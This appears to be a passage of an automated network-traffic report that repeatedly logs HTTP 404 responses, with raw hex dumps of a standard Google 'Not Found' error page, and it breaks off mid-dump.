                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 